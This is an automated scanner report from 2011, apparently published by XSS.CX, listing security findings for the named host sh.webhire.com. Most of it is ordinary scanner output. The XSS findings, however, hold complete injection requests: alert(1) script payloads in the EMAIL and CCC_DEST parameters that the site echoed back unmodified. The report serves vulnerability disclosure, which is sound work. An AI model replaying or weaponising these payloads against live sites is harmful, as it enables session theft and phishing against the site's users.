XSS, Cross Site Scripting, DORK, CWE-79, CAPEC-86

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Thu Mar 24 06:31:06 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler

Loading

1. Cross-site scripting (reflected)

1.1. http://sh.webhire.com/Profiler/login.pfl [EMAIL parameter]

1.2. http://sh.webhire.com/profiler/login_page.pfl [CCC_DEST parameter]

2. Cleartext submission of password

3. Password field with autocomplete enabled

4. Cross-domain script include

5. Multiple content types specified

6. HTML does not specify charset

7. Content type incorrectly stated



1. Cross-site scripting (reflected)  next
There are 2 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://sh.webhire.com/Profiler/login.pfl [EMAIL parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sh.webhire.com
Path:   /Profiler/login.pfl

Issue detail

The value of the EMAIL request parameter is copied into the HTML document as plain text between tags. The payload 2f4ee<script>alert(1)</script>7154b06822f6abb62 was submitted in the EMAIL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /Profiler/login.pfl?CCC_DEST=EDUS&EMAIL=2f4ee<script>alert(1)</script>7154b06822f6abb62&PASSWORD=&ACCT_NAME=GSI HTTP/1.1
Host: sh.webhire.com
Proxy-Connection: keep-alive
Referer: http://sh.webhire.com/profiler/login_page.pfl?ACCT_NAME=GSI&CCC_DEST=EDUS
Cache-Control: max-age=0
Origin: http://sh.webhire.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JobIDs=; AccountID=726; Site=I; TestCookie=TRUE

Response

HTTP/1.1 200 OK
Date: Thu, 24 Mar 2011 02:24:01 GMT
Server: Microsoft-IIS/6.0
p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 602

<html>
   <head>
       <title>Error</title>
       <link rel="stylesheet" type="text/css" href="/webhire2.css" title="Webhire Stylesheet">
   </head>
   
<body bgcolor="#FFFFFF">

<table width=100% border=0>
<tr>
<t
...[SNIP]...
<li>
Invalid value 2f4ee<script>alert(1)</script>7154b06822f6abb62 for EMAIL</li>
...[SNIP]...

1.2. http://sh.webhire.com/profiler/login_page.pfl [CCC_DEST parameter]  previous

Summary

Severity:   High
Confidence:   Certain
Host:   http://sh.webhire.com
Path:   /profiler/login_page.pfl

Issue detail

The value of the CCC_DEST request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d52fb"><script>alert(1)</script>89427b180d9 was submitted in the CCC_DEST parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /profiler/login_page.pfl?ACCT_NAME=GSI&CCC_DEST=EDUSd52fb"><script>alert(1)</script>89427b180d9 HTTP/1.1
Host: sh.webhire.com
Proxy-Connection: keep-alive
Referer: http://sh.webhire.com/public/726/indexEDUS.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JobIDs=; AccountID=726; Site=I

Response

HTTP/1.1 200 OK
Date: Thu, 24 Mar 2011 02:23:56 GMT
Server: Microsoft-IIS/6.0
p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: PROFILE_LDAP_ID=; expires=Thu, 24-Mar-2011 02:23:56 GMT; path=/
Set-Cookie: USERNAME=; expires=Thu, 24-Mar-2011 02:23:56 GMT; path=/
Set-Cookie: CANDIDATE_ID=; expires=Thu, 24-Mar-2011 02:23:56 GMT; path=/
Set-Cookie: ProfileId=; expires=Thu, 24-Mar-2011 02:23:56 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4000

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.adobe.com/spr
...[SNIP]...
<A href="https://sh.webhire.com/profiler/select_orf_type.pfl?ACCT_NAME=GSI&TemplateDir=&CCC_DEST=EDUSd52fb"><script>alert(1)</script>89427b180d9&SITE=I" class="knxa">
...[SNIP]...

2. Cleartext submission of password  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sh.webhire.com
Path:   /profiler/login_page.pfl

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

Request

GET /profiler/login_page.pfl?ACCT_NAME=GSI&CCC_DEST=EDUS HTTP/1.1
Host: sh.webhire.com
Proxy-Connection: keep-alive
Referer: http://sh.webhire.com/public/726/indexEDUS.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JobIDs=; AccountID=726; Site=I

Response

HTTP/1.1 200 OK
Date: Thu, 24 Mar 2011 02:23:50 GMT
Server: Microsoft-IIS/6.0
p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: PROFILE_LDAP_ID=; expires=Thu, 24-Mar-2011 02:23:50 GMT; path=/
Set-Cookie: USERNAME=; expires=Thu, 24-Mar-2011 02:23:50 GMT; path=/
Set-Cookie: CANDIDATE_ID=; expires=Thu, 24-Mar-2011 02:23:50 GMT; path=/
Set-Cookie: ProfileId=; expires=Thu, 24-Mar-2011 02:23:50 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 2995

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.adobe.com/spr
...[SNIP]...
<TD vAlign=top><form method=post name=login action="/Profiler/login.pfl?CCC_DEST=EDUS">
<TABLE cellSpacing=0 cellPadding=0 align=center border=0>
...[SNIP]...
<TD><INPUT type=password name=PASSWORD size=12 tabindex=2></TD>
...[SNIP]...

3. Password field with autocomplete enabled  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://sh.webhire.com
Path:   /profiler/login_page.pfl

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

Request

GET /profiler/login_page.pfl?ACCT_NAME=GSI&CCC_DEST=EDUS HTTP/1.1
Host: sh.webhire.com
Proxy-Connection: keep-alive
Referer: http://sh.webhire.com/public/726/indexEDUS.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JobIDs=; AccountID=726; Site=I

Response

HTTP/1.1 200 OK
Date: Thu, 24 Mar 2011 02:23:50 GMT
Server: Microsoft-IIS/6.0
p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: PROFILE_LDAP_ID=; expires=Thu, 24-Mar-2011 02:23:50 GMT; path=/
Set-Cookie: USERNAME=; expires=Thu, 24-Mar-2011 02:23:50 GMT; path=/
Set-Cookie: CANDIDATE_ID=; expires=Thu, 24-Mar-2011 02:23:50 GMT; path=/
Set-Cookie: ProfileId=; expires=Thu, 24-Mar-2011 02:23:50 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 2995

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.adobe.com/spr
...[SNIP]...
<TD vAlign=top><form method=post name=login action="/Profiler/login.pfl?CCC_DEST=EDUS">
<TABLE cellSpacing=0 cellPadding=0 align=center border=0>
...[SNIP]...
<TD><INPUT type=password name=PASSWORD size=12 tabindex=2></TD>
...[SNIP]...

4. Cross-domain script include  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sh.webhire.com
Path:   /public/726/headED.js

Issue detail

The response dynamically includes the following scripts from other domains:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

Request

GET /public/726/headED.js HTTP/1.1
Host: sh.webhire.com
Proxy-Connection: keep-alive
Referer: http://sh.webhire.com/public/726/indexEDUS.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 2690
Content-Type: application/x-javascript
Last-Modified: Thu, 27 Jan 2011 22:07:29 GMT
Accept-Ranges: bytes
ETag: "775574966ebecb1:383c"
Server: Microsoft-IIS/6.0
p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
X-Powered-By: ASP.NET
Date: Thu, 24 Mar 2011 02:23:39 GMT

document.writeln('<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />');
document.writeln('<title>Welcome to e-Dialog | Intelligent E-Mail Marketing. Precisely.</title>');
document
...[SNIP]...
<link href="http://www.e-dialog.com/top_navigation.css" rel="stylesheet" type="text/css" />');
document.writeln('<script language="JavaScript" src="http://www.e-dialog.com/qtip.js" type="text/javascript"></script>');
document.writeln('<script language="JavaScript1.2" type="text/javascript" src="http://www.e-dialog.com/site_navigation/mm_css_menu.js"></script>
...[SNIP]...
</style>');
document.writeln('<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

5. Multiple content types specified  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sh.webhire.com
Path:   /public/726/headED.js

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

Issue background

If a web response specifies multiple incompatible content types, then the browser will usually analyse the response and attempt to determine the actual MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of multiple incompatible content type statements does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /public/726/headED.js HTTP/1.1
Host: sh.webhire.com
Proxy-Connection: keep-alive
Referer: http://sh.webhire.com/public/726/indexEDUS.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 2690
Content-Type: application/x-javascript
Last-Modified: Thu, 27 Jan 2011 22:07:29 GMT
Accept-Ranges: bytes
ETag: "775574966ebecb1:383c"
Server: Microsoft-IIS/6.0
p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
X-Powered-By: ASP.NET
Date: Thu, 24 Mar 2011 02:23:39 GMT

document.writeln('<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />');
document.writeln('<title>Welcome to e-Dialog | Intelligent E-Mail Marketing. Precisely.</title>');
document
...[SNIP]...

6. HTML does not specify charset  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sh.webhire.com
Path:   /public/726/indexEDUS.htm

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

Request

GET /public/726/indexEDUS.htm HTTP/1.1
Host: sh.webhire.com
Proxy-Connection: keep-alive
Referer: http://www.e-dialog.com/about_contact.cfm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 9811
Content-Type: text/html
Last-Modified: Thu, 24 Mar 2011 00:54:22 GMT
Accept-Ranges: bytes
ETag: "cc5923bee9cb1:3c62"
Server: Microsoft-IIS/6.0
p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
X-Powered-By: ASP.NET
Date: Thu, 24 Mar 2011 02:23:40 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script src="/public/726
...[SNIP]...

7. Content type incorrectly stated  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://sh.webhire.com
Path:   /webhire2.css

Issue detail

The response contains the following Content-type statement:The response states that it contains CSS. However, it actually appears to contain HTML.

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /webhire2.css HTTP/1.1
Host: sh.webhire.com
Proxy-Connection: keep-alive
Referer: http://sh.webhire.com/Profiler/login.pfl?CCC_DEST=EDUS
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JobIDs=; AccountID=726; Site=I; TestCookie=TRUE

Response

HTTP/1.1 200 OK
Content-Length: 4821
Content-Type: text/css
Last-Modified: Tue, 16 Dec 2003 17:15:30 GMT
Accept-Ranges: bytes
ETag: "f5daf35f8c3c31:3c62"
Server: Microsoft-IIS/6.0
p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
X-Powered-By: ASP.NET
Date: Thu, 24 Mar 2011 02:23:56 GMT

<style type="text/css">


BODY {
        background-color: #ffffff;
    font : xx-small "MS Sans Serif", Verdana, Arial;
color: #000000;
}


H1 {
font: sm
...[SNIP]...

Report generated by XSS.CX at Thu Mar 24 06:31:06 CDT 2011.